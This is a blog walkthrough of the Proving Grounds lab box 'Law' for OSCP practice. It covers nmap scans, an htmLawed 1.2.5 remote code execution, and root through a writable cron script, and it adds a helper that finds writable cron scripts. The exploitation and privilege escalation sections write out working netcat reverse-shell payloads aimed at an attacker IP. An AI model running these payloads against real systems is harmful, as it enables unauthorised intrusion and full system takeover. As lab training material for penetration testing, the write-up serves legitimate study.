Mr.KaaLi's JARV!$
OSCP Prep Box 44 – Law – Proving Grounds Practice

Posted on March 3, 2026 (updated March 5, 2026)

Hi everyone

Today we are going to look at a box called Law, which Proving Grounds Practice rates as intermediate. The walkthrough goes through the usual phases: recon, enumeration, exploitation and privilege escalation.

Box Type: Linux

Table of Contents
  • Recon & Enumeration
  • Exploitation
  • Privilege Escalation
  • Key Takeaways

Recon & Enumeration

Enumeration plays a very significant role in pen testing: the more thoroughly you enumerate, the easier it is to get a foothold on the target.

First, check whether the target is reachable with the ping command:

ping Target_IP

The target replied, so it is reachable. (A missing reply would not prove the host is down, since ICMP is often filtered, so the port scan below is worth running either way.)

Next, run a port scan. I use Nmap, which reports which ports are open and what services sit behind them. The first scan covers Nmap's default top 1000 ports with default scripts (-sC), version detection (-sV) and OS detection (-O, which needs root); the second repeats it over all 65535 TCP ports (-p-) so that nothing on a high port is missed:

nmap -sC -sV -O -oA nmap/initial 192.168.201.190

nmap -sC -sV -O -p- -oA nmap/full 192.168.201.190 -T4

I discovered these ports are open:

  • 22/tcp – SSH Service running OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
  • 80/tcp – HTTP Service running Apache httpd 2.4.56 ((Debian))
  • OS: Linux

Then I opened the IP in the web browser and found a page running htmLawed 1.2.5.

Exploitation

I found a public RCE exploit for this version and used it to get the initial foothold:

Exploit Link

The bug is in the test/demo script that ships with htmLawed: it takes the value of the hhook POST parameter as the name of a hook function and calls that function with the text parameter as its argument, so hhook=exec runs text as a system command. The script only processes the request when the sid cookie matches the posted sid, which is why the same value is sent as both a form field and a cookie. With a netcat listener already waiting on port 80 of my attacking machine (192.168.45.162), the payload below connects a shell back to it:

Command : curl -s -d "sid=foo&hhook=exec&text=/usr/bin/nc 192.168.45.162 80 -e /usr/bin/sh" -b "sid=foo" http://192.168.201.190/

I got the shell and used find to locate local.txt:

find / -type f -name "local.txt" 2>/dev/null

That turned up the local.txt flag.

Privilege Escalation

Now it was time to escalate privileges.

Looking at scheduled tasks, I found a shell script, /var/www/cleanup.sh, that a cron job runs as root and that my low-privileged user could write to. Both facts are worth confirming before touching the file: that the script really is writable by the user you have, and that the cron entry (the system crontab, or a file under /etc/cron.d, both of which have a user column) runs it as root rather than as some other account. Since both checked out, I appended a reverse-shell line to the script:

echo "nc 192.168.45.162 9002 -e /usr/bin/bash" >> /var/www/cleanup.sh

(The command as originally written listed two ports, 80 and 9002, after the address; netcat connects to one port, and 9002 is assumed here since 80 is already tied up by the listener holding the first shell.)

I started a netcat listener on port 9002 and waited for the cron job to fire. Because the line was appended with >>, the script's original commands still run first and the job keeps working; the listener just has to stay up until the next scheduled run.

The connection came back with root privileges, and I read the proof.txt flag.
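To make the cron check repeatable, here is a small shell helper of the kind I would run on a box like this; it is an added example and not part of the original post. It parses a crontab in the system layout (the /etc/crontab and /etc/cron.d format with a user column), pulls every absolute path out of each job's command, and prints the ones that are regular files writable by the current user. The demo at the bottom runs it against a constructed crontab in a temporary directory; the paths and jobs there are made up for illustration and are not copied from the target.

```shell
#!/bin/sh
# Added example (not from the original post): list cron jobs whose command
# references a regular file that the current user can write to.
# Assumes the system-crontab layout used by /etc/crontab and /etc/cron.d/*:
#   min hour dom mon dow user command
# Per-user crontabs (crontab -l) have no user column and are not handled.

find_writable_cron_scripts() {
    crontab_file="$1"
    # Skip comments, blank lines and VAR=value assignments; after the five
    # schedule fields and the user column, the rest of the line is the command.
    grep -Ev '^[[:space:]]*(#|$|[A-Za-z_][A-Za-z0-9_]*=)' "$crontab_file" |
    while read -r min hour dom mon dow user cmd; do
        set -f                       # no globbing while splitting the command into words
        for tok in $cmd; do
            case "$tok" in
                /*)                  # only absolute paths are worth testing
                    if [ -f "$tok" ] && [ -w "$tok" ]; then
                        echo "$user $tok"
                    fi
                    ;;
            esac
        done
        set +f
    done
}

# Demo on a constructed crontab in a temp directory (made up for illustration,
# not copied from the target).
demo_dir=$(mktemp -d)
printf '#!/bin/sh\nrm -rf /var/www/html/uploads/*\n' > "$demo_dir/cleanup.sh"
chmod 777 "$demo_dir/cleanup.sh"            # world-writable, like the script on the box
printf '#!/bin/sh\nexit 0\n' > "$demo_dir/backup.sh"
chmod 555 "$demo_dir/backup.sh"             # no write bit at all
{
    printf 'SHELL=/bin/sh\nPATH=/usr/bin:/bin\n# m h dom mon dow user command\n'
    printf '* * * * * root bash %s\n' "$demo_dir/cleanup.sh"
    printf '0 3 * * * root bash %s\n' "$demo_dir/backup.sh"
    printf '0 4 * * * root bash %s\n' "$demo_dir/missing.sh"
} > "$demo_dir/crontab"
# From a low-privileged shell this prints only the cleanup.sh line; root has
# write access to everything, so run it from the shell you actually have.
find_writable_cron_scripts "$demo_dir/crontab"
rm -rf "$demo_dir"
```

Run it from the foothold shell, not as root, since -w is true for every file when you are already root. Point it at /etc/crontab and each file in /etc/cron.d; scripts dropped into /etc/cron.daily and friends are not referenced by path in those files and need a separate look at the directory permissions.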

Key Takeaways

  • Full port & service enumeration first — small version leaks can mean big exploits.
  • Don’t trust web apps at face value — outdated components are easy entry points.
  • Always inspect scheduled tasks & background jobs — privilege escalation often hides there.
  • If a higher-privileged script is writable, you own the execution flow.
  • Escalation isn’t magic — it’s finding what runs as root and making it run your code.
